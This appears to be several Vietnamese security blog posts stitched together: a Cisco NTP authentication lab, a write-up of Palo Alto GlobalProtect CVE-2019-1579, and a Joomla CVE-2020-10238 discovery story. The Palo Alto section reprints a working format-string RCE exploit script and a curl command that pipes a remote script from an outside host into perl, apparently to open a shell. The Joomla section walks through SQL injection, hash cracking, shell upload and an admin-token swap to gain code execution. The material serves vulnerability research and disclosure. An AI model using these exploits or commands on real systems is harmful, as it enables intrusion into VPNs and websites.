NTP – Network Time Protocol là một giao thức để đồng bộ đồng hồ của các hệ thống máy tính thông qua mạng dữ liệu chuyển mạch gói với độ trễ biến đổi và nó hoạt động trên port 123/UDP.

Một câu hỏi được đặt ra là máy chủ NTP này nó lấy thời gian chuẩn ở đâu ?

Một nguồn thời gian chuẩn ở đây được gọi là đồng hồ nguyên tử (atomic clock) , nghe có vẻ nguy hiểm nhưng thực chất cơ chế của nó là điều chỉnh thời gian theo giao động của nguyên tử, tần số giao động của nguyên tử nó sẽ không đổi và có thể đo được, dựa vào tất cả các yếu tố đó người ta khẳng định đồng hồ nguyên tử là loại chính xác nhất hiện tại mà dựa vào cái đồng hồ này mà toàn bộ thiết bị trên thế giới sẽ theo quy chuẩn này.

Một câu hỏi nữa được đặt ra là thu thập nó theo cách nào ?

• Thứ nhất là kết nối trực tiếp với đồng hồ nguyên tử hay từ các máy chủ khác có sử dụng NTP
• Thứ 2 thông qua hệ thống GPS, các hệ thống định vị toàn cầu này sẽ lấy các tín hiệu từ những trạm đồng hồ nguyên tử đó và chuyển các tín hiệu đó cho các thiết bị thu đầu cuối, như điện thoại hoặc các thiết bị có khả năng thu sóng vệ tinh
• Thứ 3 thông qua tín hiệu sóng radio

Các tín hiệu thời gian được sử dụng bởi hầu hết các máy chủ NTP là nguồn thời gian UTC (Coordinated Universal Time). UTC nó là thời gian toàn cầu dựa trên thời gian của đồng hồ nguyên tử và là một tiêu chuẩn được dùng để thiết lập tất cả các múi giờ trên thế giới. UTC gồm 2 phần chính là TAI, UT1

• TAI (International Atomic Time): giờ nguyên tử quốc tế, đây là thang đo thời gian của hơn 400 đồng hồ nguyên tử trên thế giới, cung cấp độ chính xác cho đồng hồ của chúng ta
• UT1 (Universal Time): Giờ thiên văn nó đề cập đến chuyển động quay của trái đất. Nó được sử dụng để so sánh tốc độ do TAI cung cấp với độ dài thực tế của một ngày trên Trái đất.

Dựa vào 2 yếu tố này nó tạo ra giờ UTC là giờ chuẩn nhất hiện nay

Tóm gọn lại, nói một cách đơn giản, máy chủ NTP tức là nó chạy một cái đồng hồ và đồng hồ này sẽ cung cấp thông tin về thời gian chuẩn cho các thiết bị mạng

Vấn đề bảo mật trong NTP

Tại sao phải sử dụng NTP, nếu ta sử dụng đồng hồ cục bộ trên các thiết bị thì vấn đề có thể xảy ra là các đồng hồ này có thể không chính xác hoặc không đồng bộ với nhau chính vì vậy mà các bản tin nhật ký mà các thiết bị này gửi về máy chủ log có thể là không chính xác nữa cho nên là sẽ khó khăn cho việc khi chúng ta muốn kiểm tra nhật ký xem là một cái sự kiện A diễn ra trong mạng tại thời điểm nào, nếu thời gian không chính xác thì rõ ràng việc điều tra về sự cố an ninh mạng nó không còn chính xác nữa cũng như là khó khăn trong việc xác định thời điểm.

Chính vì thế nếu ta chạy 1 cái đồng hồ đồng bộ cho toàn thiết bị mạng, lúc này ta chỉ cần cấu hình chính xác thời gian trên máy chủ này chính xác là được khi đó các thiết bị mạng sẽ đồng bộ theo đồng hồ ở trên máy chủ NTP này. Điều này rất là hữu ích, nó thể hiện khả năng quản lí tập trung đối với vấn đề về thời gian của các thiết bị mạng

Liệu vậy đã đủ ?

Lúc này kẻ tấn công nghĩ ra 1 thủ đoạn đó là gửi các cái bản tin thời gian giả mạo tới các thiết bị mạng này, khiến các thiết bị hoạt động sai lệch về mặt thời gian và gây khó khăn cho người quản trị mạng khi kiểm tra log, ngoài ra việc sai lệch thời gian còn làm cho các chứng chỉ số sẽ hoạt động không còn chính xác nữa vì vậy đây có thể là một trong những nguyên nhân gây ra gây ra các cuộc tấn công từ chối dịch vụ (DoS, DDoS) trên hệ thống của bạn, do đó cần phải xác thực các bản tin được trao đổi giữa NTP Server và các thiết bị mạng. Từ đó người ta nghĩ ra việc xác thực giữa máy chủ NTP và các thiết bị.

Lab

Để hiểu rõ hơn vấn đề, mình sẽ minh họa rõ hơn trong bài lab bằng thiết bị Router Cisco

Sơ đồ ví dụ

Bước 1: Cấu hình ban đầu

• Thực hiện đặt ip trên các interace của các router như trên hình
• Cấu hình định tuyến bất kỳ đảm bảo các mạng thông nhau

Bước 2: Cấu hình NTP & Xác thực

• Cấu hình R1 đóng vai trò là nguồn đồng bộ thời gian thực cho hệ thống mạng
• Cấu hình xác thực các gói tin NTP đến từ R1 của các router R2, R3, R4

Trên R1 (NTP master):

Setup thời gian chuẩn

R1(config)#clock timezone GMT +7 // múi giờ VN là GMT +7

R1(config)#ntp master 6

Xác định nguồn NTP, có thể là NTP server public, NTP từ mạng nội bộ, internal clock, trong bài lab này mình sẽ sử dụng internal clock của chính router này

R1(config)#ntp source loopback 0

R1(config)#ntp authenticate

R1(config)#ntp authentication-key 12 md5 ntppass12

R1(config)#ntp authentication-key 13 md5 ntppass13

R1(config)#ntp authentication-key 14 md5 ntppass14

R1(config)#ntp trusted-key 12

R1(config)#ntp trusted-key 13

R1(config)#ntp trusted-key 14

Trên R2 (NTP client):

R2(config)#ntp server 172.16.10.1 key 12

R2(config)#ntp authenticate

R2(config)#ntp authentication-key 12 md5 ntppass12

R2(config)#ntp trusted-key 12

Trên R3 (NTP client):

R3(config)#ntp server 172.16.10.1 key 13

R3(config)#ntp authenticate

R3(config)#ntp authentication-key 13 md5 ntppass13

R3(config)#ntp trusted-key 13

Trên R4 (NTP client):

R4(config)#ntp server 172.16.10.1 key 14

R4(config)#ntp authenticate

R4(config)#ntp authentication-key 14 md5 ntppass14

R4(config)#ntp trusted-key 14

Lưu ý: phải mất một khoảng thời gian việc đồng bộ mới diễn ra

Kiểm tra

R2#show ntp status

Clock is synchronized, stratum 7, reference is 172.16.1.1

nominal freq is 250.0000 Hz, actual freq is 250.0001 Hz, precision is 2**10

ntp uptime is 216200 (1/100 of seconds), resolution is 4000

reference time is E3057EDD.845A1E18 (11:43:09.517 GMT Fri Sep 11 2020)

clock offset is 0.0000 msec, root delay is 0.00 msec

root dispersion is 9.06 msec, peer dispersion is 5.19 msec

loopfilter state is ‘CTRL’ (Normal Controlled Loop), drift is -0.000000539 s/s

system poll interval is 64, last update was 161 sec ago.

R3#show ntp status

Clock is synchronized, stratum 7, reference is 172.16.1.1

nominal freq is 250.0000 Hz, actual freq is 250.0001 Hz, precision is 2**10

ntp uptime is 216200 (1/100 of seconds), resolution is 4000

reference time is E3057EDD.845A1E18 (11:46:02.567 GMT Fri Sep 11 2020)

clock offset is 0.0000 msec, root delay is 0.00 msec

root dispersion is 10.84 msec, peer dispersion is 5.86 msec

loopfilter state is ‘CTRL’ (Normal Controlled Loop), drift is -0.000000539 s/s

system poll interval is 64, last update was 518 sec ago.

R4#show ntp status

Clock is synchronized, stratum 7, reference is 172.16.1.1

nominal freq is 250.0000 Hz, actual freq is 250.0001 Hz, precision is 2**10

ntp uptime is 216200 (1/100 of seconds), resolution is 4000

reference time is E3057EDD.845A1E18 (11:51:02.767 GMT Fri Sep 11 2020)

clock offset is 0.0000 msec, root delay is 0.00 msec

root dispersion is 13.20msec, peer dispersion is 4.36 msec

loopfilter state is ‘CTRL’ (Normal Controlled Loop), drift is -0.000000539 s/s

system poll interval is 64, last update was 961.89 sec ago.

Kết quả show cho thấy R2, R3 và R4 đã đồng bộ thông tin thời gian thực với R1. Việc đồng bộ thành công cho thấy xác thực NTP đã diễn ra thành công.

Chúc các bạn thành công và hẹn mọi người vào blog tiếp theo về cấu hình an toàn trên server lưu log và SSH

References:

https://blog.apnic.net/2019/11/08/network-time-security-new-ntp-authentication-mechanism/

http://nelsonherron.tripod.com/itdir/cisco/ntp/ntp.htm

SSL VPN bảo vệ mạng nội bộ khỏi những cuộc tấn công trên Internet, nhưng điều gì xảy ra khi chính những dịch vụ SSL VPN lại chứa lỗ hổng bảo mật? Chúng có thể được truy cập qua Internet, là con đường được tin cậy dẫn tới mạng nội bộ của bạn. Khi một máy chủ SSL VPN bị chiếm quyền điều khiển, kẻ tấn công có thể xâm nhập vào mạng Intranet, thậm chí chiếm đoạt tất cả người dùng nết nối với máy chủ SSL VPN đó. Do tầm quan trọng của chúng, giờ đây càng ngày càng có nhiều nghiên cứu về bảo mật về các dịch vụ SSL VPN hiện có, trong đó Palo Alto là nhà cung cấp tôi chú ý nhất.

Vì sao lại là Palo Alto? Palo Alto với GlobalProtect là dịch vụ được khá nhiều các ngân hàng tại Việt Nam sử dụng. Vì vậy, việc tìm hiểu, nghiên cứu về những lỗ hổng của Palo Alto có thể giúp tôi cũng như VSEC thuận lợi trong quá trình kiểm thử bảo mật với những khách hàng là ngân hàng, tài chính.

Về lỗ hổng

Lỗ hổng mình nghiên cứu hôm nay là CVE-2019-1579, được tìm ra bởi Orange Tsai(@orange_8361) và Meh Chang(@mehqq_), là một lỗ hổng PreAuth RCE với thang điểm cve score là.

Một lỗ hổng format string đơn giản mà không cần xác thực. Sslmgr là cổng SSL xử lý các SSL handshake giữa máy chủ và máy khách. Daemon này có thể truy cập thông qua đường dẫn /sslmgr.

$ curl https://global-protect/sslmgr

<?xml version=”1.0″ encoding=”UTF-8″ ?>

<clientcert-response>

<status>error</status>

<msg>Invalid parameters</msg>

</clientcert-response>

Trong quá trình trích xuất tham số, daemon sẽ tìm kiếm chuỗi tên scep-profile-name và chuyển giá trị của nó dưới dạng định dạng snprintf để điền vào bộ đệm. Điều đó dẫn đến format string attack. Có thể làm crash dịch vụ với %n

POST /sslmgr HTTP/1.1

Host: global-protect

Content-Length: 36

scep-profile-name=%n%n%n%n%n…

Các phiên bản bị ảnh hưởng

Tất cả phiên bản GlobalProtect trước tháng bảy 2018 đều bị ảnh hưởng bởi lỗ hổng này! Danh sách các phiên bản bị ảnh hưởng:

• Palo Alto GlobalProtect SSL VPN 7.1.x < 7.1.19
• Palo Alto GlobalProtect SSL VPN 8.0.x < 8.0.12
• Palo Alto GlobalProtect SSL VPN 8.1.x < 8.1.3

Các phiên bản 7.0.x và 9.x không bị ảnh hưởng bởi lỗ hổng này.

Thực hiện tấn công

Dưới đây là payload PoC của Orange Tsai và Meh Chang của lỗ hổng này:

#!/usr/bin/python

import requests

from pwn import *

url = “https://sslvpn/sslmgr”

cmd = “echo pwned > /var/appweb/sslvpndocs/hacked.txt”

strlen_GOT = 0x667788 # change me

system_plt = 0x445566 # change me

fmt = ‘%70$n’

fmt += ‘%’ + str((system_plt>>16)&0xff) + ‘c’

fmt += ‘%32$hn’

fmt += ‘%’ + str((system_plt&0xffff)-((system_plt>>16)&0xff)) + ‘c’

fmt += ‘%24$hn’

for i in range(40,60):

fmt += ‘%’+str(i)+’$p’

data = “scep-profile-name=”

data += p32(strlen_GOT)[:-1]

data += “&appauthcookie=”

data += p32(strlen_GOT+2)[:-1]

data += “&host-id=”

data += p32(strlen_GOT+4)[:-1]

data += “&user-email=”

data += fmt

data += “&appauthcookie=”

data += cmd

r = requests.post(url, data=data)

Khi chạy thành công, sslmgr sẽ trở thành webshell với scep-profile-name là biến để inject command.

$ curl -d ‘scep-profile-name=curl orange.tw/bc.pl | perl -‘ https://global-protect/sslmgr

Case study

Một trong những case study lớn nhất của Orange là Uber, qua nghiên cứu, Orange Tsai phát hiện Uber có khoảng 22 máy chủ sử dụng GlobalProtect trên thế giới. Qua kiểm tra một máy chủ của họ, Orange tim được phiên bản sử dụng là 8.x, một phiên bản chứa lỗ hổng này. Và đây là PoC:

Reference: https://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html

Mô tả ngắn gọn về CVE mình tìm được:

1. CVE-2020-10238: Incorrect Access Control in com_templates (Bài mình nói về cái này) CVSS 2.0:5.0 và CVSS 3.x :7.5
2. CVE-2020-10239: Incorrect Access Control in com_fields SQL field CVSS 2.0:6.5 và CVSS 3.x :8.8
3. CVE-2020-10241: CSRF in com_templates image actions CVSS 2.0:6.8 và CVSS 3.x :8.8
4. Và còn … cái nữa nhưng họ đang thảo luận sửa lỗi sao cho đúng nên họ hẹn bản cập nhật sau. Đồng nghĩa là mình chưa thể public cách khai thác được :))

—————————————————————————————————————————————–

Ban đầu thì mình được tham gia vào dự án của công ty để thực hiện quá trình pentest cho ứng dụng website. Thì tại website đó có sử dụng CMS là Joomla.

Trước khi đi vào chi tiết thì mình muốn làm rõ một vài khái niệm như:

1. CVE là gì?

CVE (Common Vulnerabilities and Exposures) là 1 chương trình được khởi xướng vào năm 1999 bởi MITRE. Mục đích của chương trình này là phân loại và nhận dạng những lỗ hổng về phần cứng hoặc phần mềm, tập hợp thành 1 hệ thống mở để chuẩn hóa qui trình xác thực các lỗ hổng đã được biết. Những lỗ hổng này có thể dẫn đến các vụ tấn công an ninh mạng dưới các hình thức như chiếm quyền điều khiển hệ thống mục tiêu, đọc các dữ liệu quan trọng của người dùng như địa chỉ, số điện thoại, mã thẻ ngân hàng.

Như vậy, có thể coi CVE như 1 cơ sở dữ liệu về các lỗ hổng bảo mật, tạo thuận lợi cho việc đối chiếu thông tin giữa các công cụ và dịch vụ bảo mật khác nhau. Danh sách CVE chứa số ID, thông báo trạng thái, mô tả ngắn gọn và tài liệu tham khảo liên quan đến lỗ hổng bảo mật. Bằng việc tham chiếu CVE ID của 1 lỗ hổng nhất định, các tổ chức có thể thu thập thông tin nhanh gọn và chính xác từ nhiều nguồn tin khác nhau.

2. CMS là gì?

CMS là chữ viết tắt của Content Management System, hay còn gọi là hệ thống quản trị nội dung nhằm mục đích giúp dễ dàng quản lý, chỉnh sửa nội dung. Nội dung ở đây có thể là tin tức điện tử, báo chí hay các media hình ảnh, video, và nhiều loại tư liệu khác.

Hệ thống CMS giúp tiết kiệm thời gian quản lý, chi phí vận hành và bảo trì nên hiện nay có rất nhiều công ty sử dụng. Không chỉ là công ty mà hiện nay các blog cá nhân cũng ra đời với số lượng không hề nhỏ, và họ chọn giải pháp sử dụng CMS nhằm dễ dàng xây dựng website và quản lý nội dung, bên cạnh đó còn tiết kiệm được chi phí xây dựng website.

Và trong số đó thì có Joomla, chỉ đứng sau WordPress về mức độ phổ biến.

Thời điểm đầu

Và khi thực hiện pentest trên website đó, họ sử dụng Joomla version 1.5. Thoạt đầu thì có thể sẽ có rất nhiều CVE đã được công khai nhưng không thể khai thác. Mình quyết định duyệt quét các thành phần của Joomla. Thì website có sử dụng thành phần AllVideos Reloaded chứa lỗi SQL injection(Mình đã phải thử tay mới ra được, vì sử dụng tool đều trả về thành công trong khi thực tế là không tìm thấy, tốn rất nhiều thời gian). Chuyện gì đến cũng đến, từ SQLi có thể thu được username và password nhưng password lại được hash(MD5).salt .May mắn là có thể bruteforce được.

Khá hài là tìm được bản hash với quyền user manager và super-admin. Trong đó, quyền manager thì bạn chỉ có thể viết bài. Khi giải mã được thì tài khoản super-admin cần tiền bằng bitcoin để trả. Vì tiết kiệm tiền nên mình đã quyết định bypass bằng cách upload shell.

Như các bạn đã biết hoặc có thể chưa biết, việc bypass để upload shell của CMS là điều rất khó. Nhưng mình quyết định bypass. Bằng cách sử dụng các thủ thuật search google cũng không hiệu quả, mình chợt nghĩ thêm dấu “.” sau file để xem phản ứng là sao. Ồ, đã bypass và thực thi mã lệnh từ xa.

Thời điểm tìm kiếm

Từ đây, đã nung nấu trong lòng là tìm CVE. Khi tìm đến phiên bản mới mới thì mới phát hiện là đã có người tìm ra rồi, được 6.8 điểm. Khá tiếc.

Rồi, ra Tết Nguyên Đán thì phải đi làm. Ngay ngày đầu tiền của năm mình đã tìm cách bypass trên phiên bản mới nhất nhưng bất thành. Mình đã chuyển sang hướng khác là tìm cách xem họ có kiểm soát sai cách không? Tức là thực hiện quyền khi không được phép do ứng dụng không kiểm tra hoặc kiểm tra sai.

Trong chính sách phân quyền của Joomla, có 3 tài khoản là manger,admin và superadmin. Nếu bạn là superadmin thì bạn có thể làm mọi thứ. Nhưng khi phân quyền, rõ ràng là admin có quyền thấp hơn là không thể thực thi mã bằng cách gì đó.

Mình quyết định đi từ quyền admin vì rõ ràng quyền manager sẽ không hiệu quả. Bắt tay vào làm thì có một thành phần tên com_template cho phép người dùng có thể thêm/xóa/sửa code của template trực tiếp từ giao diện website như hình ảnh minh họa:

Giao diện template của super-admin

Phiên bản bị ảnh hưởng là nhỏ hơn hoặc bằng 3.9.15.

Link truy cập nhanh :

yourdomain/administrator/index.php?option=com_templates&view=template&id=506&file=aG9tZQ==

Giao diện cho biết người đó là superadmin.

Mình tiến hành đăng nhập với quyền admin thì như sau:

Rõ ràng là khác nhau đã xảy ra.

Ý tưởng như sau: Sẽ sử dụng quyền admin để chỉnh sửa file index.php để thực thi mã lệnh từ xa(RCE).

Mình quyết định bắt request chỉnh sửa file index.php ở trên của quyền superadmin như sau:

Thêm vào file index.php code php thực thi mã như sau:

Thêm code để RCE

Tiến hành lưu lại và dùng Burpsuite để bắt request này:

Để dễ nhìn thì mình xóa hết file và chỉ để mã code như trên cho dễ nhìn:

Token của super-admin

Phần bôi vàng là token của superadmin. Joomla sử dụng token để loại bỏ lỗi CSRF. Không sao, ở đây là quyền admin.

Giữ lại request này. Và đăng nhập bằng quyền admin.

Để lấy token của admin thì mình làm như hình:

Chọn Edit và dùng Burpsuite để bắt request này:

Tìm token của admin

Phần bôi vàng chính là token của admin.

Bây giờ thực hiện thay token của admin cho superadmin và sửa phần URI như sau:

Request để RCE

Chuyển tiếp và kết quả:

Lưu thành công

Vậy là đã chèn mã thực thi, tự hỏi shell ở đâu?

Đơn giản, bạn chỉ cần về homepage như sau để thực thi mã:

RCE

Khi tìm được thì mình đã gửi mail cho Joomla theo hướng dẫn trên trang chủ của họ và kết quả sau cuối:

Mail gán CVE của Joomla

Để cho tự động hơn, mình viết tool để khai thác lỗi này cách sử dụng như sau:

Khai thác bằng tool

Video thực hiện:

https://vimeo.com/396947804

Mã nguồn cho lỗi này có tại:

https://github.com/HoangKien1020/Joomla-CVE/tree/master/CVE-2020-10238

CVE được gán:

https://developer.joomla.org/security-centre/804-20200303-core-incorrect-access-control-in-com-templates.html

Nguồn tham khảo cho các khái niệm:

1. https://cystack.net/vi/resource/zero-day-la-gi-cve-la-gi/
2. https://freetuts.net/cms-la-gi-cac-cms-pho-bien-hien-nay-342.html